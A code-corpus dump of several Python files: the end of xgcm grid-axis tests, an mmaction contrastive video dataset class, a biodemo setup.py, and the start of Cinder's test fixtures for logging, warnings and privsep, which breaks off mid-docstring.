data_interp_expected = xr.DataArray(
0.5 * (data_left + data_right), dims=[coord_to], coords={coord_to: ds[coord_to]}
)
data_interp = axis.interp(da, to, boundary=boundary)
assert data_interp_expected.equals(data_interp)
# check without "to" specified
assert data_interp.equals(axis.interp(da, boundary=boundary))
# difference
data_diff_expected = xr.DataArray(
data_right - data_left, dims=[coord_to], coords={coord_to: ds[coord_to]}
)
data_diff = axis.diff(da, to, boundary=boundary)
assert data_diff_expected.equals(data_diff)
# check without "to" specified
assert data_diff.equals(axis.diff(da, boundary=boundary))
# max
data_max_expected = xr.DataArray(
np.maximum(data_right, data_left),
dims=[coord_to],
coords={coord_to: ds[coord_to]},
)
data_max = axis.max(da, to, boundary=boundary)
assert data_max_expected.equals(data_max)
# check without "to" specified
assert data_max.equals(axis.max(da, boundary=boundary))
# min
data_min_expected = xr.DataArray(
np.minimum(data_right, data_left),
dims=[coord_to],
coords={coord_to: ds[coord_to]},
)
data_min = axis.min(da, to, boundary=boundary)
assert data_min_expected.equals(data_min)
# check without "to" specified
assert data_min.equals(axis.min(da, boundary=boundary))
# this mega test covers all options for 2D data
@pytest.mark.parametrize(
"boundary", ["extend", "fill", pytest.param("extrapolate", marks=pytest.mark.xfail)]
)
@pytest.mark.parametrize("axis_name", ["X", "Y"])
@pytest.mark.parametrize(
"varname, this, to", [("data_c", "center", "left"), ("data_g", "left", "center")]
)
def test_axis_diff_and_interp_nonperiodic_2d(
all_2d, boundary, axis_name, varname, this, to
):
ds, periodic, _ = all_2d
try:
ax_periodic = axis_name in periodic
except TypeError:
ax_periodic = periodic
boundary_arg = boundary if not ax_periodic else None
axis = Axis(ds, axis_name, periodic=ax_periodic, boundary=boundary_arg)
da = ds[varname]
# everything is left shift
data = ds[varname].data
axis_num = da.get_axis_num(axis.coords[this])
# lookups for numpy.pad
numpy_pad_arg = {"extend": "edge", "fill": "constant"}
# args for numpy.pad
pad_left = (1, 0)
pad_right = (0, 1)
pad_none = (0, 0)
if this == "center":
if ax_periodic:
data_left = np.roll(data, 1, axis=axis_num)
else:
pad_width = [
pad_left if i == axis_num else pad_none for i in range(data.ndim)
]
the_slice = tuple(
[
slice(0, -1) if i == axis_num else slice(None)
for i in range(data.ndim)
]
)
data_left = np.pad(data, pad_width, numpy_pad_arg[boundary])[the_slice]
data_right = data
elif this == "left":
if ax_periodic:
data_left = data
data_right = np.roll(data, -1, axis=axis_num)
else:
pad_width = [
pad_right if i == axis_num else pad_none for i in range(data.ndim)
]
the_slice = tuple(
[
slice(1, None) if i == axis_num else slice(None)
for i in range(data.ndim)
]
)
data_right = np.pad(data, pad_width, numpy_pad_arg[boundary])[the_slice]
data_left = data
data_interp = 0.5 * (data_left + data_right)
data_diff = data_right - data_left
# determine new dims
dims = list(da.dims)
dims[axis_num] = axis.coords[to]
coords = {dim: ds[dim] for dim in dims}
da_interp_expected = xr.DataArray(data_interp, dims=dims, coords=coords)
da_diff_expected = xr.DataArray(data_diff, dims=dims, coords=coords)
da_interp = axis.interp(da, to)
da_diff = axis.diff(da, to)
assert da_interp_expected.equals(da_interp)
assert da_diff_expected.equals(da_diff)
if boundary_arg is not None:
if boundary == "extend":
bad_boundary = "fill"
elif boundary == "fill":
bad_boundary = "extend"
da_interp_wrong = axis.interp(da, to, boundary=bad_boundary)
assert not da_interp_expected.equals(da_interp_wrong)
da_diff_wrong = axis.diff(da, to, boundary=bad_boundary)
assert not da_diff_expected.equals(da_diff_wrong)
def test_axis_errors():
ds = datasets["1d_left"]
ds_noattr = ds.copy()
del ds_noattr.XC.attrs["axis"]
with pytest.raises(
ValueError, match="Couldn't find a center coordinate for axis X"
):
_ = Axis(ds_noattr, "X", periodic=True)
del ds_noattr.XG.attrs["axis"]
with pytest.raises(ValueError, match="Couldn't find any coordinates for axis X"):
_ = Axis(ds_noattr, "X", periodic=True)
ds_chopped = ds.copy().isel(XG=slice(None, 3))
del ds_chopped["data_g"]
with pytest.raises(ValueError, match="coordinate XG has incompatible length"):
_ = Axis(ds_chopped, "X", periodic=True)
ds_chopped.XG.attrs["c_grid_axis_shift"] = -0.5
with pytest.raises(ValueError, match="coordinate XG has incompatible length"):
_ = Axis(ds_chopped, "X", periodic=True)
del ds_chopped.XG.attrs["c_grid_axis_shift"]
with pytest.raises(
ValueError,
match="Found two coordinates without `c_grid_axis_shift` attribute for axis X",
):
_ = Axis(ds_chopped, "X", periodic=True)
ax = Axis(ds, "X", periodic=True)
with pytest.raises(
ValueError, match="Can't get neighbor pairs for the same position."
):
ax.interp(ds.data_c, "center")
with pytest.raises(
ValueError, match="This axis doesn't contain a `right` position"
):
ax.interp(ds.data_c, "right")
# This case is broken, need to fix!
# with pytest.raises(
# ValueError, match="`boundary=fill` is not allowed " "with periodic axis X."
# ):
# ax.interp(ds.data_c, "left", boundary="fill")
@pytest.mark.parametrize(
"boundary", [None, "fill", "extend", "extrapolate", {"X": "fill", "Y": "extend"}]
)
@pytest.mark.parametrize("fill_value", [None, 0, 1.0])
def test_grid_create(all_datasets, boundary, fill_value):
ds, periodic, expected = all_datasets
grid = Grid(ds, periodic=periodic)
assert grid is not None
for ax in grid.axes.values():
assert ax.boundary is None
grid = Grid(ds, periodic=periodic, boundary=boundary, fill_value=fill_value)
for name, ax in grid.axes.items():
if isinstance(boundary, dict):
expected = boundary.get(name)
else:
expected = boundary
assert ax.boundary == expected
if fill_value is None:
expected = 0.0
elif isinstance(fill_value, dict):
expected = fill_value.get(name)
else:
expected = fill_value
assert ax.fill_value == expected
def test_create_grid_no_comodo(all_datasets):
ds, periodic, expected = all_datasets
grid_expected = Grid(ds, periodic=periodic)
ds_noattr = ds.copy()
for var in ds.variables:
ds_noattr[var].attrs.clear()
coords = expected["axes"]
grid = Grid(ds_noattr, periodic=periodic, coords=coords)
for axis_name_expected in grid_expected.axes:
axis_expected = grid_expected.axes[axis_name_expected]
axis_actual = grid.axes[axis_name_expected]
_assert_axes_equal(axis_expected, axis_actual)
def test_grid_no_coords(periodic_1d):
ds, periodic, expected = periodic_1d
ds_nocoords = ds.drop_dims(list(ds.dims.keys()))
coords = expected["axes"]
grid = Grid(ds_nocoords, periodic=periodic, coords=coords)
diff = grid.diff(ds["data_c"], "X")
assert len(diff.coords) == 0
interp = grid.interp(ds["data_c"], "X")
assert len(interp.coords) == 0
def test_grid_repr(all_datasets):
ds, periodic, _ = all_datasets
grid = Grid(ds, periodic=periodic)
r = repr(grid).split("\n")
assert r[0] == "<xgcm.Grid>"
def test_grid_ops(all_datasets):
"""
Check that we get the same answer using Axis or Grid objects
"""
ds, periodic, _ = all_datasets
grid = Grid(ds, periodic=periodic)
for axis_name in grid.axes.keys():
try:
ax_periodic = axis_name in periodic
except TypeError:
ax_periodic = periodic
axis = Axis(ds, axis_name, periodic=ax_periodic)
bcs = [None] if ax_periodic else ["fill", "extend"]
for varname in ["data_c", "data_g"]:
for boundary in bcs:
da_interp = grid.interp(ds[varname], axis_name, boundary=boundary)
da_interp_ax = axis.interp(ds[varname], boundary=boundary)
assert da_interp.equals(da_interp_ax)
da_diff = grid.diff(ds[varname], axis_name, boundary=boundary)
da_diff_ax = axis.diff(ds[varname], boundary=boundary)
assert da_diff.equals(da_diff_ax)
if boundary is not None:
da_cumsum = grid.cumsum(ds[varname], axis_name, boundary=boundary)
da_cumsum_ax = axis.cumsum(ds[varname], boundary=boundary)
assert da_cumsum.equals(da_cumsum_ax)
@pytest.mark.parametrize("func", ["interp", "max", "min", "diff", "cumsum"])
@pytest.mark.parametrize("periodic", ["True", "False", ["X"], ["Y"], ["X", "Y"]])
@pytest.mark.parametrize(
"boundary",
[
"fill",
# "extrapolate", # do we not support extrapolation anymore?
"extend",
{"X": "fill", "Y": "extend"},
{"X": "extend", "Y": "fill"},
],
)
def test_multi_axis_input(all_datasets, func, periodic, boundary):
ds, periodic_unused, expected_unused = all_datasets
grid = Grid(ds, periodic=periodic)
axes = list(grid.axes.keys())
for varname in ["data_c", "data_g"]:
serial = ds[varname]
for axis in axes:
boundary_axis = boundary
if isinstance(boundary, dict):
boundary_axis = boundary[axis]
serial = getattr(grid, func)(serial, axis, boundary=boundary_axis)
full = getattr(grid, func)(ds[varname], axes, boundary=boundary)
xr.testing.assert_allclose(serial, full)
def test_grid_dict_input_boundary_fill(nonperiodic_1d):
"""Test axis kwarg input functionality using dict input"""
ds, _, _ = nonperiodic_1d
grid_direct = Grid(ds, periodic=False, boundary="fill", fill_value=5)
grid_dict = Grid(ds, periodic=False, boundary={"X": "fill"}, fill_value={"X": 5})
assert grid_direct.axes["X"].fill_value == grid_dict.axes["X"].fill_value
assert grid_direct.axes["X"].boundary == grid_dict.axes["X"].boundary
def test_invalid_boundary_error():
ds = datasets["1d_left"]
with pytest.raises(ValueError):
Axis(ds, "X", boundary="bad")
with pytest.raises(ValueError):
Grid(ds, boundary="bad")
with pytest.raises(ValueError):
Grid(ds, boundary={"X": "bad"})
with pytest.raises(ValueError):
Grid(ds, boundary={"X": 0})
with pytest.raises(ValueError):
Grid(ds, boundary=0)
def test_invalid_fill_value_error():
ds = datasets["1d_left"]
with pytest.raises(ValueError):
Axis(ds, "X", fill_value="x")
with pytest.raises(ValueError):
Grid(ds, fill_value="bad")
with pytest.raises(ValueError):
Grid(ds, fill_value={"X": "bad"})
@pytest.mark.parametrize(
"funcname",
[
"diff",
"interp",
"min",
"max",
"integrate",
"average",
"cumsum",
"cumint",
"derivative",
],
)
@pytest.mark.parametrize("gridtype", ["B", "C"])
def test_keep_coords(funcname, gridtype):
ds, coords, metrics = datasets_grid_metric(gridtype)
ds = ds.assign_coords(yt_bis=ds["yt"], xt_bis=ds["xt"])
grid = Grid(ds, coords=coords, metrics=metrics)
func = getattr(grid, funcname)
for axis_name in grid.axes.keys():
result = func(ds.tracer, axis_name)
base_coords = list(result.dims)
augmented_coords = [
c for c in ds.tracer.coords if set(ds[c].dims).issubset(result.dims)
]
if funcname in ["integrate", "average"]:
assert set(result.coords) == set(base_coords + augmented_coords)
else:
assert set(result.coords) == set(base_coords)
#
if funcname not in ["integrate", "average"]:
result = func(ds.tracer, axis_name, keep_coords=False)
assert set(result.coords) == set(base_coords)
#
result = func(ds.tracer, axis_name, keep_coords=True)
assert set(result.coords) == set(base_coords + augmented_coords)
def test_boundary_kwarg_same_as_grid_constructor_kwarg():
ds = datasets["2d_left"]
grid1 = Grid(ds, periodic=False)
grid2 = Grid(ds, periodic=False, boundary={"X": "fill", "Y": "fill"})
actual1 = grid1.interp(ds.data_g, ("X", "Y"), boundary={"X": "fill", "Y": "fill"})
actual2 = grid2.interp(ds.data_g, ("X", "Y"))
xr.testing.assert_identical(actual1, actual2)
@pytest.mark.parametrize(
"metric_axes,metric_name",
[("X", "dx_t"), ("Y", "dy_ne"), (["Y", "X"], "dy_n")],
)
def test_interp_like(metric_axes, metric_name):
ds, coords, _ = datasets_grid_metric("C")
grid = Grid(ds, coords=coords)
grid.set_metrics(metric_axes, metric_name)
metric_available = grid._metrics.get(frozenset(metric_axes), None)
metric_available = metric_available[0]
interp_metric = grid.interp_like(metric_available, ds.u)
test_metric = grid.interp(ds[metric_name], metric_axes)
xr.testing.assert_equal(interp_metric, test_metric)
xr.testing.assert_allclose(interp_metric, test_metric)
@pytest.mark.parametrize(
"var_name,like_name,var_axes",
[
("tracer", "u", "X"),
],
)
def test_interp_like_var(var_name, like_name, var_axes):
ds, coords, metrics = datasets_grid_metric("C")
grid = Grid(ds, coords=coords, metrics=metrics)
interp_var = grid.interp_like(ds[var_name], ds[like_name])
test_var = grid.interp(ds[var_name], var_axes)
xr.testing.assert_equal(interp_var, test_var)
xr.testing.assert_allclose(interp_var, test_var)
| 34.366748 | 88 | 0.64115 |
4a1f452c2c4c38185c394af33b0463bb03fd5fd1 | 3,864 | py | Python | mmaction/datasets/rawframe_dataset_contrastive.py | lambert-x/video_semisup | 8ff44343bb34485f8ad08d50ca4d8de22e122c1d | [
"Apache-2.0"
] | null | null | null | mmaction/datasets/rawframe_dataset_contrastive.py | lambert-x/video_semisup | 8ff44343bb34485f8ad08d50ca4d8de22e122c1d | [
"Apache-2.0"
] | null | null | null | mmaction/datasets/rawframe_dataset_contrastive.py | lambert-x/video_semisup | 8ff44343bb34485f8ad08d50ca4d8de22e122c1d | [
"Apache-2.0"
] | null | null | null | import copy
import numpy as np
import torch
from .pipelines import Compose
from .rawframe_dataset import RawframeDataset
from .builder import DATASETS
@DATASETS.register_module()
class RawframeDataset_Contrastive(RawframeDataset):
"""Rawframe dataset for action recognition.
    Each item returns several independently augmented clips of the same video so
    that a contrastive objective can be computed across them. Only valid at
    training time; test-time behaviour is not implemented.
    Args:
        ann_file (str): Path to the annotation file.
        pipeline (list[dict | callable]): A sequence of data transforms applied
            to every sampled clip.
        contrast_clip_num (int): Number of augmented clips sampled per video.
        pipeline_appearance (list[dict | callable] | None): Optional extra
            sequence of data transforms. Default: None.
        data_prefix (str): Path to a directory where videos are held.
            Default: None.
        test_mode (bool): Store True when building test or validation dataset.
            Default: False.
        filename_tmpl (str): Template for each filename.
            Default: 'img_{:05}.jpg'.
        with_offset (bool): Determines whether the offset information is in
            ann_file. Default: False.
        multi_class (bool): Determines whether it is a multi-class
            recognition dataset. Default: False.
        num_classes (int): Number of classes in the dataset. Default: None.
        start_index (int): Index of the first frame. Default: 1.
        modality (str): Modality of data. Support 'RGB' only.
"""
def __init__(self,
ann_file,
pipeline,
contrast_clip_num,
pipeline_appearance=None,
data_prefix=None,
test_mode=False,
filename_tmpl='img_{:05}.jpg',
with_offset=False,
multi_class=False,
num_classes=None,
start_index=1,
modality='RGB'):
assert modality == 'RGB'
super().__init__(ann_file, pipeline, data_prefix, test_mode, filename_tmpl, with_offset,
multi_class, num_classes, start_index, modality)
if pipeline_appearance is not None:
self.pipeline_appearance = Compose(pipeline_appearance)
else:
self.pipeline_appearance = None
self.contrast_clip_num = contrast_clip_num
def prepare_train_frames(self, idx):
"""Prepare the frames for training given the index."""
results = copy.deepcopy(self.video_infos[idx])
results['filename_tmpl'] = self.filename_tmpl
results['modality'] = self.modality
results['start_index'] = self.start_index
# output = dict()
        # Step 1: forward each clip through the base pipeline
results_contrast_all = []
for i in range(self.contrast_clip_num):
results_single_clip = self.pipeline(copy.deepcopy(results))
results_contrast_all.append(results_single_clip)
# if self.pipeline_appearance is not None:
# results_appearance = self.pipeline_appearance(copy.deepcopy(results_main))
# output = self.pipeline_format(results_main)
# output['imgs_appearance'] = results_appearance['imgs']
# else:
# output = self.pipeline_format(results_main)
output = dict()
for key in ['imgs', 'label', 'imgs_diff']:
output[key] = torch.cat([result[key] for result in results_contrast_all], dim=0)
return output
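    # Note on the returned dict (descriptive comment, not in the original source):
    # 'imgs', 'label' and 'imgs_diff' of the individual clips are concatenated
    # along dim 0, so downstream code can recover the per-clip tensors by splitting
    # each entry into contrast_clip_num equal chunks, e.g. (illustrative sketch):
    #   imgs_per_clip = output['imgs'].chunk(self.contrast_clip_num, dim=0)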
def prepare_test_frames(self, idx):
raise NotImplementedError
def evaluate(self,
results,
metrics='top_k_accuracy',
topk=(1, 5),
logger=None):
raise NotImplementedError
| 40.25 | 112 | 0.631211 |
4a1f4668f9f5fa13041040bae456e10f161942a9 | 873 | py | Python | setup.py | maryletteroa/biodemo | 470dccac212505cbd9791b6e24889070ef1247c4 | [
"MIT"
] | null | null | null | setup.py | maryletteroa/biodemo | 470dccac212505cbd9791b6e24889070ef1247c4 | [
"MIT"
] | null | null | null | setup.py | maryletteroa/biodemo | 470dccac212505cbd9791b6e24889070ef1247c4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# setuptools (rather than distutils) is needed for the entry_points and
# install_requires arguments used below; plain distutils would ignore them.
from setuptools import setup
LONG_DESCRIPTION = \
'''The program reads one or more input FASTA files.
For each file it computes a variety of statistics, and then
prints a summary of the statistics as output.
The goal is to provide a solid foundation for new bioinformatics command line tools,
and to serve as an ideal starting place for new projects.'''
setup(
name='biodemo',
version='0.1.0.0',
author='Marylette Roa',
author_email='[email protected]',
packages=['biodemo'],
package_dir={'biodemo': 'biodemo'},
entry_points={
'console_scripts': ['biodemo = biodemo.biodemo:main']
},
url='https://github.com/GITHUB_USERNAME/biodemo',
license='LICENSE',
description=('A prototypical bioinformatics command line tool'),
long_description=(LONG_DESCRIPTION),
install_requires=["biopython"],
)
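# Illustrative usage note (not part of the original file): after installing the
# package (e.g. `pip install .`), the console_scripts entry point above exposes a
# `biodemo` command that dispatches to biodemo.biodemo:main; the exact command-line
# flags depend on that main() implementation.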
| 29.1 | 84 | 0.710195 |
4a1f478a9c6fbf18528c8d86b1cf22d210ca1677 | 7,890 | py | Python | docs/conf.py | chen23/f5-azure-saca | 5edb5a95defadc702d1360e44862d50149b8c57d | [
"MIT"
] | null | null | null | docs/conf.py | chen23/f5-azure-saca | 5edb5a95defadc702d1360e44862d50149b8c57d | [
"MIT"
] | null | null | null | docs/conf.py | chen23/f5-azure-saca | 5edb5a95defadc702d1360e44862d50149b8c57d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
#
# BEGIN CONFIG
# ------------
#
# REQUIRED: Your class/lab name
classname = "F5 Azure SACA"
# OPTIONAL: The URL to the GitHub Repository for this class
github_repo = "https://github.com/f5devcentral/f5-azure-saca"
# OPTIONAL: Google Analytics
# googleanalytics_id = 'UA-85156643-4'
#
# END CONFIG
# ----------
import os
import sys
import time
import re
import pkgutil
import string
sys.path.insert(0, os.path.abspath('.'))
import f5_sphinx_theme
year = time.strftime("%Y")
eventname = "%s Hands-on Guide" % (year)
rst_prolog = """
.. |classname| replace:: %s
.. |classbold| replace:: **%s**
.. |classitalic| replace:: *%s*
.. |ltm| replace:: Local Traffic Manager
.. |adc| replace:: Application Delivery Controller
.. |gtm| replace:: Global Traffic Manager
.. |dns| replace:: DNS
.. |asm| replace:: Application Security Manager
.. |afm| replace:: Advanced Firewall Manager
.. |apm| replace:: Access Policy Manager
.. |pem| replace:: Policy Enforcement Manager
.. |ipi| replace:: IP Intelligence
.. |iwf| replace:: iWorkflow
.. |biq| replace:: BIG-IQ
.. |bip| replace:: BIG-IP
.. |aiq| replace:: APP-IQ
.. |ve| replace:: Virtual Edition
.. |icr| replace:: iControl REST API
.. |ics| replace:: iControl SOAP API
.. |f5| replace:: F5 Networks
.. |f5i| replace:: F5 Networks, Inc.
.. |year| replace:: %s
""" % (classname,
classname,
classname,
year)
if 'github_repo' in locals() and len(github_repo) > 0:
rst_prolog += """
.. |repoinfo| replace:: The content contained here leverages a full DevOps CI/CD
pipeline and is sourced from the GitHub repository at %s.
                          Bugs and Requests for enhancements can be made by
opening an Issue within the repository.
""" % (github_repo)
else:
rst_prolog += ".. |repoinfo| replace:: \ \n"
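# Illustrative note (not in the original conf.py): because rst_prolog is prepended
# to every source file, the substitutions defined above can be used directly in any
# .rst page of this guide, e.g.
#   Welcome to |classname| (|year|). |repoinfo|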
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
on_snops = os.environ.get('SNOPS_ISALIVE', None) == 'True'
print("on_rtd = %s" % on_rtd)
print("on_snops = %s" % on_snops)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinxjp.themes.basicstrap',
'sphinx.ext.todo',
'sphinx.ext.autosectionlabel'
]
if 'googleanalytics_id' in locals() and len(googleanalytics_id) > 0:
extensions += ['sphinxcontrib.googleanalytics']
googleanalytics_enabled = True
eggs_loader = pkgutil.find_loader('sphinxcontrib.spelling')
found = eggs_loader is not None
if found:
extensions += ['sphinxcontrib.spelling']
spelling_lang='en_US'
spelling_word_list_filename='../wordlist'
spelling_show_suggestions=True
spelling_ignore_pypi_package_names=False
spelling_ignore_wiki_words=True
spelling_ignore_acronyms=True
spelling_ignore_python_builtins=True
spelling_ignore_importable_modules=True
spelling_filters=[]
source_parsers = {
'.md': 'recommonmark.parser.CommonMarkParser',
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = ['.rst', '.md']
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = classname
copyright = u'2017, F5 Networks, Inc.'
author = u'F5 Networks, Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
release = u''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_emit_warnings = True
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'f5_sphinx_theme'
html_theme_path = f5_sphinx_theme.get_html_theme_path()
html_sidebars = {'**': ['searchbox.html', 'localtoc.html', 'globaltoc.html','relations.html']}
html_theme_options = {
'site_name': 'Community Training Classes & Labs',
'next_prev_link': True
}
def setup(app):
app.add_stylesheet('css/f5_agility_theme.css')
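    # Added note: newer Sphinx releases deprecate app.add_stylesheet in favour of
    # app.add_css_file, so the call above assumes an older Sphinx version.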
if on_rtd:
templates_path = ['_templates']
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
cleanname = re.sub('\W+','',classname)
# Output file base name for HTML help builder.
htmlhelp_basename = cleanname + 'doc'
# -- Options for LaTeX output ---------------------------------------------
front_cover_image = 'front_cover'
back_cover_image = 'back_cover'
front_cover_image_path = os.path.join('_static', front_cover_image + '.png')
back_cover_image_path = os.path.join('_static', back_cover_image + '.png')
latex_additional_files = [front_cover_image_path, back_cover_image_path]
template = string.Template(open('preamble.tex').read())
latex_contents = r"""
\frontcoverpage
\contentspage
"""
backcover_latex_contents = r"""
\backcoverpage
"""
latex_elements = {
'papersize': 'letterpaper',
'pointsize': '10pt',
'fncychap': r'\usepackage[Bjornstrup]{fncychap}',
'preamble': template.substitute(eventname=eventname,
project=project,
author=author,
frontcoverimage=front_cover_image,
backcoverimage=back_cover_image),
'tableofcontents': latex_contents,
'printindex': backcover_latex_contents
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, '%s.tex' % cleanname, u'%s Documentation' % classname,
u'F5 Networks, Inc.', 'manual', True),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, cleanname.lower(), u'%s Documentation' % classname,
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, classname, u'%s Documentation' % classname,
author, classname, classname,
'Training'),
]
| 30.114504 | 94 | 0.676806 |
4a1f47a21c9acc1d62a0685376bc229c25b2811b | 1,411 | py | Python | test/test_markdown_transform_to_gfm.py | scop/pymarkdown | 562ba8f7857d99ba09e86e42de5a37ec6d9b2c30 | [
"MIT"
] | 20 | 2021-01-14T17:39:09.000Z | 2022-03-14T08:35:22.000Z | test/test_markdown_transform_to_gfm.py | scop/pymarkdown | 562ba8f7857d99ba09e86e42de5a37ec6d9b2c30 | [
"MIT"
] | 304 | 2020-08-15T23:24:00.000Z | 2022-03-31T23:34:03.000Z | test/test_markdown_transform_to_gfm.py | scop/pymarkdown | 562ba8f7857d99ba09e86e42de5a37ec6d9b2c30 | [
"MIT"
] | 3 | 2021-08-11T10:26:26.000Z | 2021-11-02T20:41:27.000Z | """
https://github.github.com/gfm/#lists
"""
import pytest
from pymarkdown.markdown_token import (
EndMarkdownToken,
MarkdownToken,
MarkdownTokenClass,
)
from pymarkdown.transform_to_gfm import TransformToGfm
@pytest.mark.gfm
def test_gfm_bad_token():
"""
Test to ensure that a bad markdown token asserts an error.
"""
# Arrange
transformer = TransformToGfm()
tokens_to_test = [
MarkdownToken("bad", MarkdownTokenClass.INLINE_BLOCK),
]
# Act
try:
transformer.transform(tokens_to_test)
assert False, "should have failed"
except AssertionError as this_exception:
captured_exception = this_exception
# Assert
assert (
str(captured_exception)
== "Markdown token type <class 'pymarkdown.markdown_token.MarkdownToken'> not supported."
)
@pytest.mark.gfm
def test_gfm_bad_end_token():
"""
Test to ensure that a bad markdown end token asserts an error.
"""
# Arrange
transformer = TransformToGfm()
tokens_to_test = [
EndMarkdownToken("bad", "", None, "hi", False),
]
# Act
try:
transformer.transform(tokens_to_test)
assert False, "should have failed"
except AssertionError as this_exception:
captured_exception = this_exception
# Assert
assert str(captured_exception) == "Markdown token end type bad not supported."
| 23.131148 | 97 | 0.673281 |
4a1f486efca49905579a71bad170d7031e9f84b2 | 6,670 | py | Python | cinder/tests/fixtures.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 571 | 2015-01-01T17:47:26.000Z | 2022-03-23T07:46:36.000Z | cinder/tests/fixtures.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 37 | 2015-01-22T23:27:04.000Z | 2021-02-05T16:38:48.000Z | cinder/tests/fixtures.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 841 | 2015-01-04T17:17:11.000Z | 2022-03-31T12:06:51.000Z | # Copyright 2016 IBM Corp.
# Copyright 2017 Rackspace Australia
# Copyright 2018 Michael Still and Aptira
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Fixtures for Cinder tests."""
import logging as std_logging
import os
import warnings
import fixtures
from oslo_config import cfg
from oslo_policy import policy as oslo_policy
from oslo_privsep import daemon as privsep_daemon
import cinder.policy
CONF = cfg.CONF
_TRUE_VALUES = ('True', 'true', '1', 'yes')
class NullHandler(std_logging.Handler):
"""custom default NullHandler to attempt to format the record.
Used in conjunction with
log_fixture.get_logging_handle_error_fixture to detect formatting errors in
debug level logs without saving the logs.
"""
def handle(self, record):
self.format(record)
def emit(self, record):
pass
def createLock(self):
self.lock = None
class StandardLogging(fixtures.Fixture):
"""Setup Logging redirection for tests.
There are a number of things we want to handle with logging in tests:
* Redirect the logging to somewhere that we can test or dump it later.
* Ensure that as many DEBUG messages as possible are actually
executed, to ensure they are actually syntactically valid (they
often have not been).
* Ensure that we create useful output for tests that doesn't
overwhelm the testing system (which means we can't capture the
100 MB of debug logging on every run).
To do this we create a logger fixture at the root level, which
defaults to INFO and create a Null Logger at DEBUG which lets
us execute log messages at DEBUG but not keep the output.
To support local debugging OS_DEBUG=True can be set in the
environment, which will print out the full debug logging.
There are also a set of overrides for particularly verbose
modules to be even less than INFO.
"""
def setUp(self):
super(StandardLogging, self).setUp()
# set root logger to debug
root = std_logging.getLogger()
root.setLevel(std_logging.INFO)
# supports collecting debug level for local runs
if os.environ.get('OS_DEBUG') in _TRUE_VALUES:
level = std_logging.DEBUG
else:
level = std_logging.INFO
# Collect logs
fs = '%(asctime)s %(levelname)s [%(name)s] %(message)s'
self.logger = self.useFixture(
fixtures.FakeLogger(format=fs, level=None))
# TODO(sdague): why can't we send level through the fake
# logger? Tests prove that it breaks, but it's worth getting
# to the bottom of.
root.handlers[0].setLevel(level)
if level > std_logging.DEBUG:
# Just attempt to format debug level logs, but don't save them
handler = NullHandler()
self.useFixture(fixtures.LogHandler(handler, nuke_handlers=False))
handler.setLevel(std_logging.DEBUG)
# Don't log every single DB migration step
std_logging.getLogger(
'migrate.versioning.api').setLevel(std_logging.WARNING)
# At times we end up calling back into main() functions in
# testing. This has the possibility of calling logging.setup
# again, which completely unwinds the logging capture we've
# created here. Once we've setup the logging in the way we want,
# disable the ability for the test to change this.
def fake_logging_setup(*args):
pass
self.useFixture(
fixtures.MonkeyPatch('oslo_log.log.setup', fake_logging_setup))
class WarningsFixture(fixtures.Fixture):
"""Filters out warnings during test runs."""
def setUp(self):
super(WarningsFixture, self).setUp()
# NOTE(sdague): Make deprecation warnings only happen once. Otherwise
# this gets kind of crazy given the way that upstream python libs use
# this.
warnings.simplefilter('once', DeprecationWarning)
# NOTE(sdague): this remains an unresolved item around the way
# forward on is_admin, the deprecation is definitely really premature.
warnings.filterwarnings(
'ignore',
message='Policy enforcement is depending on the value of is_admin.'
' This key is deprecated. Please update your policy '
'file to use the standard policy values.')
self.addCleanup(warnings.resetwarnings)
class UnHelperfulClientChannel(privsep_daemon._ClientChannel):
def __init__(self, context):
raise Exception('You have attempted to start a privsep helper. '
'This is not allowed in the gate, and '
'indicates a failure to have mocked your tests.')
class PrivsepNoHelperFixture(fixtures.Fixture):
"""A fixture to catch failures to mock privsep's rootwrap helper.
If you fail to mock away a privsep'd method in a unit test, then
